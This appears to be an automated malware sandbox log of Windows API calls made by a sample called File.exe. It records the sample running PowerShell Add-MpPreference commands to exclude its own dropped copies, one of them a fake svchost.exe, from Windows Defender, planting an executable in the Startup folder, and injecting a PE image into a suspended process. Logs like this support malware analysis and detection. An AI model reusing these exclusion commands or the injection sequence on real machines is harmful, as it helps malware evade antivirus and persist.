CreateProcessInternalW June 21, 2021, 12:57 p.m.	thread_identifier: 1036 thread_handle: 0x00000704 process_identifier: 7076 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000724	1	1
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x00000718 suspend_count: 1 process_identifier: 8024	1	0
CreateProcessInternalW June 21, 2021, 12:57 p.m.	thread_identifier: 3320 thread_handle: 0x00000724 process_identifier: 5860 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000073c	1	1
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x00000730 suspend_count: 1 process_identifier: 8024	1	0
CreateProcessInternalW June 21, 2021, 12:57 p.m.	thread_identifier: 3080 thread_handle: 0x0000073c process_identifier: 4104 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000754	1	1
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x00000748 suspend_count: 1 process_identifier: 8024	1	0
CreateProcessInternalW June 21, 2021, 12:57 p.m.	thread_identifier: 3264 thread_handle: 0x00000744 process_identifier: 2224 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe" filepath_r: C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fdb1n217b2a716347aYpy7b42e8M8jdfM23.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000768	1	1
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x0000073c suspend_count: 1 process_identifier: 8024	1	0
CreateProcessInternalW June 21, 2021, 12:57 p.m.	thread_identifier: 3004 thread_handle: 0x00000770 process_identifier: 6956 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000784	1	1
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x00000774 suspend_count: 1 process_identifier: 8024	1	0
CreateProcessInternalW June 21, 2021, 12:57 p.m.	thread_identifier: 7276 thread_handle: 0x00000790 process_identifier: 8920 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\File.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000079c	1	1
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x0000078c suspend_count: 1 process_identifier: 8024	1	0
CreateProcessInternalW June 21, 2021, 12:57 p.m.	thread_identifier: 3448 thread_handle: 0x00000794 process_identifier: 6848 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe" -Force filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000007b4	1	1
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x000007d0 suspend_count: 1 process_identifier: 8024	1	0
CreateProcessInternalW June 21, 2021, 12:57 p.m.	thread_identifier: 500 thread_handle: 0x000007d8 process_identifier: 5476 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c timeout 1 filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000007f0	1	1
CreateProcessInternalW June 21, 2021, 12:57 p.m.	thread_identifier: 7640 thread_handle: 0x000007e4 process_identifier: 2576 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\File.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\File.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000007e0	1	1
NtGetContextThread June 21, 2021, 12:57 p.m.	thread_handle: 0x000007e4	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 2576 region_size: 172032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000007e0	1	0
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÆ`à8ø¾W `@ pWK`À H.textÄ7 8 `.sdataÁð`ò<@À.rsrcÀ`.@@.reloc2@B base_address: 0x00400000 process_identifier: 2576 process_handle: 0x000007e0	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: base_address: 0x00402000 process_identifier: 2576 process_handle: 0x000007e0	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: base_address: 0x00416000 process_identifier: 2576 process_handle: 0x000007e0	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: 0 HX`häh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsQQFW NoYv(CompanyNameCDS8FileDescriptionWUN LPg0FileVersion3.2.8.1: InternalNameZOQi RgU.exez+LegalCopyrightCopyright 2020 © DhA. All rights reserved.2LegalTrademarksCknCB OriginalFilenameZOQi RgU.exe2 ProductNameZOQi RgU4ProductVersion8.2.2.48Assembly Version8.2.2.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x00426000 process_identifier: 2576 process_handle: 0x000007e0	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: PÀ7 base_address: 0x00428000 process_identifier: 2576 process_handle: 0x000007e0	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2576 process_handle: 0x000007e0	1	1
NtSetContextThread June 21, 2021, 12:57 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4282302 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000007e4 process_identifier: 2576	1	0
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x000007e4 suspend_count: 1 process_identifier: 2576	1	0
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x00000294 suspend_count: 1 process_identifier: 3916	1	0
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x000002e8 suspend_count: 1 process_identifier: 3916	1	0
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x00000390 suspend_count: 1 process_identifier: 3916	1	0
NtResumeThread June 21, 2021, 12:57 p.m.	thread_handle: 0x0000041c suspend_count: 1 process_identifier: 3916	1	0

File.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All